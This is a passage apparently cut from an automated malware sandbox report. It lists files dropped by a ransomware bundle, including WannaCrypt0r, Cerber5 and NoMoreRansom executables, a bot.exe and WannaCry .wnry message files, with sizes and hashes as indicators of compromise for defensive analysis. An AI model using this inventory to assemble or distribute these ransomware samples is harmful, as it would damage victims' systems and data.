                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      701KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      cb960c030f900b11e9025afea74f3c0c

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      bbdcad9527c814a9e92cdc1ee27ae9db931eb527

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      91a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      9ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CabA9A8.tmp
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      65KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      ac05d27423a85adc1622c714f2cb6184

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      b0fe2b1abddb97837ea0195be70ab2ff14d43198

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\103941712738536.bat
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      356B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      56bda98548d75c62da1cff4b1671655b

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      90a0c4123b86ac28da829e645cb171db00cf65dc

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      35e5885504a1745554c26f49a0adab2d26a532838f8e495f211572d42ea19ead

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      eefeab1311ded740628cf3fed32e750266dd2daa833ab8212f8ffe548967f0bd94e48cf11c75345150885268404c0275aab56b4210fb4f21883046611a567a72

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      2a94f3960c58c6e70826495f76d00b85

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Endermanch@Cerber5.exe
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      313KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      fe1bc60a95b2c2d77cd5d232296a7fa4

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      c07dfdea8da2da5bad036e7c2f5d37582e1cf684

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Endermanch@NoMoreRansom.exe
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.4MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      63210f8f1dde6c40a7f3643ccf0ff313

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      57edd72391d710d71bead504d44389d0462ccec9

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Endermanch@WannaCrypt0r.exe
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      3.4MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      84c82835a5d21bbcf75a61706d8ab549

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      5KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      93e4504d4c585cfda1979b37e75fe39a

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      5d4296f36e878b263c5da6ad8abd6174e4dff5d8

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      69aaab4b888c83b3f77d524313f9383d9edaa73e4af111a7a637e9f84a1609d7

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      072638bee318f5e15af53cf3f9efd9156aa4836c40e8fb5f1f856706331cb11b528dfebe8e88713fc7146fefb1e66a614cff2f4e87676d886d2f09d945cbd1a0

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      74fdac19593602b8d25a5e2fdb9c3051

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      81db52e9ad1be5946dffa3c89f5302633a7698d2

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      f06ebef0b912b94d7e0af3915f2a6b6b64f74cb60bc8aaa1104c874761a0dee6

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      8ffb507e46c99f1fede3f12c14998cd41afa8cfc5c815756343041f1bef6faf7ba4429cebeb87b0fb807d911f5516d235d5f893e519576b1fb675d25d025c21b

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      5.8MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      637e757d38a8bf22ebbcd6c7a71b8d14

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      0e711a8292de14d5aa0913536a1ae03ddfb933ec

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      477c13d4ca09fdb7fea6487641c6a904d4dee1adecd74ac42e0b00a3842503f9

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      e7a3576370967a4cbd53c33bf65ae26881cca3f713df5bdbcdc9ed76b79e9102c26d5bf940fc2a0e880c7b7ab83c13dcad24608d23981cbcaf551d4e800c67ac

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\b.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.4MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      c17170262312f3be7027bc2ca825bf0c

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      f19eceda82973239a1fdc5826bce7691e5dcb4fb

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      742KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      a8b8b90c0cf26514a3882155f72d80bd

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      75679e54563b5e5eacf6c926ac4ead1bcc19344f

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      4fe94f6567af0c38ee6f0f5a05d36286c0607552ea97166a56c4f647e9bf2452

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      88708b20357f1d46957d56d80ac10479cffad72d6bb0268383d360e8904f341c01542b9bbe121b024ef6d6850a1ea4494e077ff124bc9201ae141c46ab1359a4

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      780B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      93f33b83f1f263e2419006d6026e7bc1

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      1a4b36c56430a56af2e0ecabd754bf00067ce488

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_bulgarian.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      46KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      95673b0f968c0f55b32204361940d184

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (simplified).wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      53KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      0252d45ca21c8e43c9742285c48e91ad

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      5c14551d2736eef3a1c1970cc492206e531703c1

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (traditional).wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      77KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      2efc3690d67cd073a9406a25005f7cea

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      52c07f98870eabace6ec370b7eb562751e8067e9

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_croatian.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      38KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      17194003fa70ce477326ce2f6deeb270

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      e325988f68d327743926ea317abb9882f347fa73

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_czech.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      39KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      537efeecdfa94cc421e58fd82a58ba9e

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      3609456e16bc16ba447979f3aa69221290ec17d0

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_danish.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      2c5a3b81d5c4715b7bea01033367fcb5

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      b548b45da8463e17199daafd34c23591f94e82cd

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_dutch.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      7a8d499407c6a647c03c4471a67eaad7

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_english.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      fe68c2dc0d2419b38f44d83f2fcf232e

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      6c6e49949957215aa2f3dfb72207d249adf36283

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_filipino.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      08b9e69b57e4c9b966664f8e1c27ab09

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      2da1025bbbfb3cd308070765fc0893a48e5a85fa

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_finnish.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      37KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      35c2f97eea8819b1caebd23fee732d8f

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_french.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      37KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      4e57113a6bf6b88fdd32782a4a381274

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      0fccbc91f0f94453d91670c6794f71348711061d

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_german.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      3d59bbb5553fe03a89f817819540f469

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      26781d4b06ff704800b463d0f1fca3afd923a9fe

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_greek.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      47KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      fb4e8718fea95bb7479727fde80cb424

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      1088c7653cba385fe994e9ae34a6595898f20aeb

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_indonesian.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      3788f91c694dfc48e12417ce93356b0f

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_italian.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      30a200f78498990095b36f574b6e8690

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      c4b1b3c087bd12b063e98bca464cd05f3f7b7882

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_japanese.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      79KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      b77e1221f7ecd0b5d696cb66cda1609e

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      51eb7a254a33d05edf188ded653005dc82de8a46

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_korean.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      89KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      6735cb43fe44832b061eeb3f5956b099

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      d636daf64d524f81367ea92fdafa3726c909bee1

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_latvian.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      c33afb4ecc04ee1bcc6975bea49abe40

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      fbea4f170507cde02b839527ef50b7ec74b4821f

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_norwegian.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      ff70cc7c00951084175d12128ce02399

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      75ad3b1ad4fb14813882d88e952208c648f1fd18

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_polish.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      38KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      e79d7f2833a9c2e2553c7fe04a1b63f4

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_portuguese.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      37KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      fa948f7d8dfb21ceddd6794f2d56b44f

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      ca915fbe020caa88dd776d89632d7866f660fc7a

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_romanian.wnry
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      50KB

                                                                                                                                                                                                                                                                      MD5

